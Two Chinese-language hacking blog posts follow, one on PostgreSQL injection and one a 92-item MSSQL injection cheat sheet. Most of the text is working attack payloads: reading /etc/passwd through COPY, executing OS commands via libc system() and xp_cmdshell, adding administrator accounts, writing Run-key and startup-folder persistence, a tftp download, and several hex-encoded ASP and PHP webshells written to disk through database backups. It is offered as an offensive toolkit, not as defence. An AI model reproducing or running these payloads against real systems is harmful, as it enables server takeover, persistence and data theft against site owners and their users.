postgresql注入手记

haifanlovely@163.com(enjoyhack) — Fri,04 Mar 2011 01:19:04 +0800

PostgreSQL是一个强大开源的关系数据库系统.它经过了15年多的开发历程,一个经得起考验的体系结构,在可靠性、数据完整性和正确性方面赢得了极好的声誉.它运行在所有主要的操作系统上,包括Linux、UNIX (AIX, BSD, HP-UX, SGI IRIX, Mac OS X, Solaris, Tru64)和Windows. 它是完全符合ACID原则，完全支持外键、联合、视图、触发器和存储过程(多种语言)。

它包含了SQL92和SQL99的大部分数据类型，包括INTEGER,NUMERIC,BOOLEAN,CHAR,VARCHAR,DATE,INTERVAL和TIMESTAMP.它也支持存储二进制巨型对象,包括图片、声音和视频.它有本地编程接口，C/C++、Java、.Net、Perl、Python、Ruby、Tcl、ODBC，其中还有特别的文档.PostgreSQL以执行标准为傲。

它强有力地实现了ANSI-SQL 92/99标准.它充分支持子查询(包括FROM子句的子选择) 、提交读(read-committed)、序列化事务隔离级别.虽然PostgreSQL有一个完全关系系统编目(catalog)它自己支持每数据库多重纲要(schema),它的编目也可以通过SQL标准定义的纲要信息(Information Schema)来存取.数据完整性功能包括(复合)主键、限制和级联更新/删除的外键、CHECK约束、UNIQUE约束和非空约束.它也有许多扩展和高级功能.其中有为了方便按顺序自动增加列值,LIMIT/OFFSET允许返回部分结果集.PostgreSQL支持符合、惟一、局部和函数索引,可以使用B-tree,R-tree,hash,或者GiST存储方法中的任一个。

安装

1.windows下:在官网(http://www.postgresql.org)下载windows下安装包,目前最新版本是8.3的,这里需要注意下,安装PostgreSQL时会在系统用户中添加一个postgres用户,而且在windows下的Postgresql密码自带有类似于安全策略的东西,设置密码是需要复杂度和长度的限制.安装好后,需要配置系统环境变量,把../PostgreSQL/bin添加到系统环境变量,这样的话,可以直接在cmd中执行psql(类似于mysql在windows下的mysql.exe)。

2.*nix下安装:可以到官网下载相应的安装包或者在线安装,安装过程不会出现设置密码这个步骤,默认密码是空,使用psql的时候需要切换postgres用户登录就可以了。

基本语法

既然是数据库当然遵循SQL语言,create、insert、update等被称为PL/PgSQL,但不是很明确,一个数据库的语法太多了,只说下对小黑们有用的几个语法。

1.注释、结束标记、连接符
a.PostgreSQL既然遵循SQL语言,当然支持--注释;
b.PostgreSQL支持/*和/**/注释,这点类似于Mysql;
c.PostgreSQL数据库使用psql的时候,需要在命令后加上;(分号)或者是\g来表示语句已经结束以执行查询.
d.PostgreSQL是采用||符号来连接字符串的,注意使用^,小心|被转义。

2.自动匹配
PostgreSQL不像Mysql能够自动匹配字段,这点类似于oracle,所以在注入的时候要注意下,而且默认情况下是支持union查询的;

3.连接PostgreSQL

默认情况下是不给外连的,如果想远程管理PostgreSQL数据库的话,需要修改../PostgreSQL/data/pg_bha.conf文件,请参考        PostgreSQL学习手册.PostgreSQL默认用户是postgres(类似于mysql的root),默认端口是5432,默认系统库是postgres。

使用psql -h ip -d dataname -p port -U username,这里注意-U参数是大写,如果是本机采用默认安装的话,直接使用psql -U     postgres后会提示输入密码,正确输入密码后会出现postgres=#的字符(类似于mysql中的mysql>),就可以正常使用psql了。

\? 显示pgsql命令的说明
\h 显示sql命令的说明
\q 是退出
\l 是现实系统中所有的数据库

4.pgAdmin III和phpPgAdmin
a.pgAdmin III是PostgreSQL中自带的界面化数据库管理程序,可以查询PostgreSQL数据库中所有域、函数、序列、数据表结构及相关属性、触发器函数、视图等。

b.phpPgAdmin看名字就知道类似mysql的phpMyAdmin,是使用php开发的网页版数据库管理程序,功能非常强大,使用过phpMyAdmin的朋友   都知道phpMyAdmin的强大,phpPgAdmin针对PostgreSQL数据库一样强大。

注入PostgreSQL

既然PostgreSQL是RDBMS,所以系统中所有数据库的结构会保存系统库中,所以注入的时候就相对比较方便。由于注释方式和mysql是一样,如何判断是什么数据库?关于这点我也没有一个标准的答案,我想可以扫描5432端口(如何web和库没有分离的情况下),使用version()函数的返回结果来判断,直接使用查询语句如select * from pg_class/select * from pg_group的返回结果来判断数据库类型.由于PostgreSQL的目录页存在information_schema,我手上也没有PostgreSQL数据库的注射点,所以我也不知道能不能使用select schema_name from information_schema_schemata来判断,不好意思,关于使用information_schema只是我的想法,有条件的朋友验证下。

介绍下PostgreSQL中内置函数、表和视图在入侵的应用。
current_database()    当前数据库名字
session_user          会话用户                         |
current_user          目前执行环境中的用户名   |这三个函数调用时候不需要加()
user                      和session_user一样          |
inet_client_port()    远程端口
cast(sourcetype AS targettype)   定义类型转换
current_setting()     以查询形式获取setting_name 设置的当前值
convert()             编码转换
pg_stat_user_tables   存放系统所有表名的视图,关键字段是relname,使用select relname from pg_stat_user_tables limit offset,1 来达到逐个读取表名的目的
pg_stat_all_tables    和pg_stat_all_tables视图功能一样
pg_shadow             看到shadow大家是否想到/etc/shadow,此表包含数据库用户的信息,关键字段username、passwd和usesuper(超级用户的意思),不过此表被做了权限设置
pg_user               这个表结构和pg_shadow一样,不过此表的全局可读,passwd字段可能被清空或者加密
pg_group              定义组以及哪些用户属于哪个组的信息,关键字段groname
information_schema.columns 这个目录对象中保存了所有的字段,关键字段是column_name,使用select column_name from   information_columns where table_name=tablename limit offset,1这样就可以达到读取每个表名的字段

读文件

首先需要建立一个表,然后copy文件内容到表中,在读取表内容,思路是这样的
create table read (line text);
copy read from '/etc/passwd';alter table read add id serial--
select * from read;
drop read;
思路就是这样的,具体怎么使用就看大家自己发挥了(encode,^_^)

从PostgreSQL 8.2后加入了pg_file_read(text,text,bool)和pg_file_write(text,text,bool),看名字就应该知道是干什么用的吧,大家自己去挖掘吧!

if(empty($_GET['action']))
{

?>

exit;
}

if(!empty($_GET['action']))//连接postgresql
{
if(!empty($_POST['pghost']))
$_SESSION['pghost']=$_POST['pghost'];
if(!empty($_POST['pgport']))
$_SESSION['pgport']=$_POST['pgport'];
if(!empty($_POST['pgdbname']))
$_SESSION['pgdbname']=$_POST['pgdbname'];
if(!empty($_POST['pgusername']))
$_SESSION['pgusername']=$_POST['pgusername'];
if(!empty($_POST['pgpassword']))
$_SESSION['pgpassword']=$_POST['pgpassword'];
$dbconn_string = "host={$_SESSION['pghost']} port={$_SESSION['pgport']} dbname={$_SESSION['pgdbname']} user={$_SESSION['pgusername']} password={$_SESSION['pgpassword']}";
$dbconn=pg_connect($dbconn_string);

if(!$dbconn)
{
die('failed linking to the server,please check reset' );
}
else
echo '^_^ connected successfully and the status is '.pg_connection_status($dbconn).'

';
}

如何获得webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);

http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$$$);

http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;

如何读文件
 http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
当然，这些的postgresql的数据库版本必须大于8.X。

创建一个system的函数：
Create FUNCTION system(cstring) RETURNS int AS ’/lib/libc.so.6’, ’system’ LANGUAGE ’C’ STRICT

创建一个输出表：
Create TABLE stdout(id serial, system_out text)

执行shell，输出到输出表内：
Select system(’uname -a > /tmp/test’)

copy 输出的内容到表里面；
COPY stdout(system_out) FROM ’/tmp/test’

从输出表内读取执行后的回显，判断是否执行成功

Select system_out FROM stdout

下面是测试例子

/store.php?id=1; Create TABLE stdout(id serial, system_out text) -- /store.php?id=1; Create FUNCTION system(cstring) RETURNS int AS
’/lib/libc.so.6’,’system’ LANGUAGE ’C’STRICT --/store.php?id=1; Select system(’uname -a > /tmp/test’) --/store.php?id=1; COPY stdout(system_out) FROM ’/tmp/test’ --/store.php?id=1 UNION ALL Select NULL,(Select stdout FROM system_out
orDER BY id DESC),NULL LIMIT 1 OFFSET 1--

MSSQL注入语句详解

haifanlovely@163.com(enjoyhack) — Wed,10 Nov 2010 23:10:53 +0800

1、返回的是连接的数据库名
and db_name()>0
2、作用是获取连接用户名
and user>0
3、将数据库备份到Web目录下面
;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--
4、显示SQL系统版本
and 1=(select @@VERSION) 或and 1=convert(int,@@version)--
5、判断xp_cmdshell扩展存储过程是否存在
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name ='xp_cmdshell')
6、恢复xp_cmdshell扩展存储的命令
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
7、向启动组中写入命令行和执行程序
;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\
Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
8、查看当前的数据库名称
and 0 <> db_name(n) n改成0,1,2,3……就可以跨库了或and 1=convert(int,db_name())--
9、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令（同第76）
10、则把得到的数据内容全部备份到WEB目录下
;backup database 数据库名 to disk='c:\inetpub\wwwroot\save.db'
11、通过复制CMD创建UNICODE漏洞
;exec master.dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe"
12、遍历系统的目录结构，分析结果并发现WEB虚拟目录
先创建一个临时表：temp   ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
(1)利用xp_availablemedia来获得当前所有驱动器,并存入temp表中       ;insert temp exec master.dbo.xp_availablemedia;--
通过查询temp的内容来获得驱动器列表及相关信息
(2)利用xp_subdirs获得子目录列表,并存入temp表中                    ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
(3)还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中 ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- （实验成功）
13、查看某个文件的内容，可以通过执行xp_cmdsell
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
14、将一个文本文件插入到一个临时表中
;bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
15、每完成一项浏览后，应删除TEMP中的所有内容，删除方法是：
;delete from temp;--
16、浏览TEMP表的方法是：
and (select top 1 id from TestDB.dbo.temp)>0   假设TestDB是当前连接的数据库名
17、猜解所有数据库名称
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 dbid=6,7,8分别得到其它库名
18、猜解数据库中用户名表的名称
and (select count(*) from TestDB.dbo.表名)>0   若表名存在，则abc.asp工作正常，否则异常。如此循环，直到猜到系统帐号表的名称。
19、判断是否是sysadmin权限
and 1=(Select IS_SRVROLEMEMBER('sysadmin'))
20、判断是否是SA用户
'sa'=(Select System_user)
21、查看数据库角色
;use model--
22、查看库名
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)--
23、获得第一个用户建立表的名称
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0 假设要获得数据库是TestDB.dbo
24、获得第二个用户建立的表的名称
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz'))>0
25、获得第三个用户建立的表的名称
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz',''))>0 ''中为第二个用户名
26、获得第四个用户建立的表的名称
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz','',''))>0 '',''中为第二,三个用户名
27、获得表中记录的条数
and (select count(*) from 表名）<5 记录条数小于5 或 <10 记录条数小于10 ……等等
28、测试权限结构（mssql）
and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(Select IS_MEMBER('db_owner'));--
29、添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
30、简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
请求的时候，像这样子用：
http://ip/l.asp?c=dir
31、猜解字段名称
猜解法：and (select count(字段名) from 表名)>0 若“字段名”存在，则返回正常
读取法：and (select top 1 col_name(object_id('表名'),1) from sysobjects)>0 把col_name(object_id('表名'),1)中的1依次换成2,3,4,5，6…就可得到所有的字段名称。
32、猜解用户名与密码
ASCII码逐字解码法:基本的思路是先猜出字段的长度，然后依次猜出每一位的值
and (select top 1 len(username) from admin)=X(X=1,2，3,4，5，… n，假设：username为用户名字段的名称，admin为表的名称若x为某一值i且abc.asp运行正常时，则i就是第一个用户名的长度。
and (select top 1 ascii(substring(username,m,1)) from admin)=n (m的值在上一步得到的用户名长度之间，当m=1，2,3，…时猜测分别猜测第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之间的任意值；admin为系统用户帐号表的名称)，
33、建立数据表
;create table 表名 (列名1 数据类型,列名2 数据类型);--
34、向表格中插入数据
;insert into 表名 (列名1,列名2，……） values ('值1','值2'……);--
35、更新记录
update 表名 set 列名1='值'…… where ……
36、删除记录
delete from 表名 where ……
37、删除数据库表格
drop table 表名
38、将文本文件导入表
使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。简单地创建这个表：
create table foo( line varchar(8000))
然后执行bulk insert操作把文件中的数据插入到表中，如：
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
39、备份当前数据库的命令：
declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--
40、使用sp_makewebtask处理过程的相关请求写入URL
; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "Select * FROM INFORMATION_SCHEMA.TABLES"
41、将获得SQLSERVER进程的当前工作目录中的目录列表
Exec master..xp_cmdshell 'dir'
42、将提供服务器上所有用户的列表
Exec master..xp_cmdshell 'net user'
43、读注册表存储过程
exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
44、xp_servicecontrol过程允许用户启动，停止，暂停和继续服务
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
45、显示机器上有用的驱动器
Xp_availablemedia
46、允许获得一个目录树
Xp_dirtree
47、提供进程的进程ID，终止此进程
Xp_terminate_process
48、恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'
49、堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"
50、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
51、在数据库内添加一个hax用户
;exec sp_addlogin hax;--
52、给hax设置密码
;exec master.dbo.sp_password null,username,password;--
53、将hax添加到sysadmin组
;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
54、(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
55、(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;--　获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--　获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--　获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--　查看文件的内容
56、mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'　　以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'　返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'　写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'　删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Tes
tkey'　删除键,包括该键下所有值
57、mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
58、简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
请求的时候，像这样子用：
http://ip/l.asp?c=dir
59、利用其它存储过程执行命令
; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net user cntest chinatest /add';--
60、利用内置存储过程 xp_regread(读取注册表键值，权限public)：
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test);--
利用爆字段将数据库的值读出来
and 0<>(select top 1 paths from newtable)
61、利用FSO直接写入ASP木马（提示必须拥用SYSADMIN权限才可使用FSO和FSO开启的前提下）(作用：E：\WWW下创建一个test.asp并写入On Error Resume next语句)
;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',
%20@o%20out%20exec%20sp_oamethod%20@o,%20'createtextfile',%20@f%20out,%20'e：\www\test.asp',
1%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20NULL,%20'On Error Resume Next';--
62、猜字段中记录长度
and (select top 1 len(字段名) from 数据库名)>0
63、(1)猜字段的ascii值（access)
and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
    (2)猜字段的ascii值（mssql)
and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
64、检索系统用户
Select * from sysxlogins
65、SQL7中的建表命令
create table [dbo].[temp] ([id] [nvarchar](255) ,[num1] [nvarchar](255) ,[num2] [nvarchar](255) ,[num3] [nvarchar](255))
66、检索数据库的命令
select * from [dbo].[temp]
67、差异备份
(1)declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737335323635 backup database @a to disk=@s
(2)Drop table [heige];create table [dbo].[heige] ([cmd] [image])
(3)insert into heige(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E) //values('<%execute(request("value"))%>')
(4)declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C6B79736A7A7765625C6B79736A7A7765625C72692E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT   [url=]//@s='d:\kysjzweb\kysjzweb\ri.asp'[/url]
(5)Drop table [heige]
68、如何删除 cmdshell 存储过程
您必须有系统管理员用户权除去 cmdshell 存储过程。要删除存储过程,
在命令提示符处键入以下命令：
exec sp_dropextendedproc 'xp_cmdshell'
要重新添加 cmdshell 存储过程, 在命令提示符处键入以下命令：
exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'
69、添加SQL帐户并加入管理组
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
70、查看WEB网站安装目录命令：
cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt （将2换成1、3、4、5试试）
type c:\test1.txt
del c:\test1.txt
71、查找某个文件
c:\>dir 文件名 /s 查找c盘下的此文件
72、建立/删除虚拟目录
建立虚拟目录win,指向c:\winnt\system32：exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
让win目录具有解析asp脚本权限：exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accesxxxecute "true" –s:'
删除虚拟目录win：exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
73、win2000下将WEB用户提升为系统用户权限，需要有管理员的权限才能执行
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"         2000系统
或者cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"   2003系统
查看是否成功：
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
74、如何隐藏ASP木马：
建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
75、sql2005开启xp_cmdshell
MSSQL SERVER 2005默认把xpcmdshell 给ON了
如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。
分析器
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
76、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:/>c:/temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:/temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
drop TABLE MYTMP
77、xp_cmdshell新的恢复办法
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复，不用去管sp_addextendedproc是不是存在
78、sp_makewebtask的用法
EXECUTE sp_makewebtask @outputfile='C:\WEB\yfdmm.asp',
@query='Select 你的字段 FROM 你建的临时表'
79、用存储过程写文件
写vbs文件到启动组里面：
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', null,
'set wshshell=createobject("wscript.shell")'
exec @ret = sp_oamethod @f, 'writeline', null,
'a=wshshell.run ("cmd.exe /c net user lintao lintao520 /add",0)'
exec @ret = sp_oamethod @f, 'writeline', null,
'b=wshshell.run ("cmd.exe /c net localgroup administrators lintao /add",0)'
80、tftp下载的命令
tftp -i ip get 下载文件名保存文件名说明：ip是提供下载的服务器IP
81、显示注册表中的一个子键下的所有键值
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\run'
82、用其它存储过程写文件
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c echo 12345678>c:\123.txt' 在c盘上写123.txt，内容是：12345678
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c tasklist>c:\123.txt'     列进程写进123.txt windowsxp/2003系统
83、将文本文件导入表
create table foo(line varchar(8000))
bulk insert foo from 'c:\123.txt'
84、log备份
alter database XXXX set RECOVERY FULL
create table cmd (a image)
backup log XXXX to disk = 'c:\Sammy' with init
insert into cmd (a) values ('<%Execute(request("value"))%>')
backup log XXXX to disk = 'c:\xxx\2.asp'
85、sp_makewebtask直接写一句话
;exec sp_makewebtask @outputfile='D:\Homepage\sohostudio\img\23456.asp',@query='select ''<%25execute (request("value"))%25>'' '
86、读WEB位置
;create table [dbo].[cxd] ([cxd][char](255));--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots ', '/', @result output insert into cxd(cxd) values(@result);--
87、另一种LOG备份
;alter database XXXX set RECOVERY FULL--
;create table [dbo].[shit_tmp] ([cmd] [image])--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--
;insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E)--     //values('<%execute(request("value"))%>')
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C0061006C006C005F0068006F006D0065005C00790065006C006C006F0077005F0068006F006D0065005C007200690035002E00610073007000 backup log @a to disk=@s with init,no_truncate--     [url=]//@s=e:\all_home\yellow_home\ri5.asp[/url]
;Drop table [shit_tmp]--
88、一句话马的几种写法
a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).
e).<%25Execute(request("a"))%25>
89、另两种差异备份
(1)
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s--
;create table [dbo].[xiaolu] ([cmd] [image])--
;insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
(2)
;backup database 库名 to disk = 'c:\ddd.bak'--
;create table [dbo].[dtest] ([cmd] [image])--
;insert into dtest(cmd) values (0x3C25657865637574652872657175657374282261222929253E)--
;backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT--
90、不需要FSO的WEBSHELL
<%=server.createobject("wscript.shell").exec("cmd.exe /c "request("c")).stdout.readall%>
十六进制为： 0x3C253D7365727665722E6372656174656F626A6563742822777363726970742E7368656C6C22292E657865632822636D642E657865202F63202226726571756573742822632229292E7374646F75742E72656164616C6C253E
91、建一个cmd.asp的语句：
use model
create table cmd (str image);
insert into cmd(str) values ('<% Dim oScript %>');
insert into cmd(str) values ('<% Dim oScriptNet%>');
insert into cmd(str) values ('<% Dim oFileSys, oFile%>');
insert into cmd(str) values ('<% Dim szCMD, szTempFile%>');
insert into cmd(str) values ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>');
insert into cmd(str) values ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>');
insert into cmd(str) values ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>');
insert into cmd(str) values ('<% szCMD = Request.Form(".CMD")%>');
insert into cmd(str) values ('<% If (szCMD <> "") Then%>');
insert into cmd(str) values ('<% szTempFile = "C:\" oFileSys.GetTempName()%>');
insert into cmd(str) values ('<% Call oScript.Run ("cmd.exe /c " szCMD & " > " & szTempFile, 0, True)%>');
insert into cmd(str) values ('<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>');
insert into cmd(str) values ('<% End If %>');
insert into cmd(str) values ('" method="POST">');
insert into cmd(str) values ('">

'); 
insert into cmd(str) values ('<% If (IsObject(oFile)) Then%>'); 
insert into cmd(str) values ('<% On Error Resume Next%>'); 
insert into cmd(str) values ('<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>'); 
insert into cmd(str) values ('<% oFile.Close%>'); 
insert into cmd(str) values ('<% Call oFileSys.DeleteFile(szTempFile, True)%>'); 
insert into cmd(str) values ('<% End If%>'); 
insert into cmd(str) values ('');
92、cmd.asp代码：
<% Dim oScript %> 
<% Dim oScriptNet%> 
<% Dim oFileSys, oFile%> 
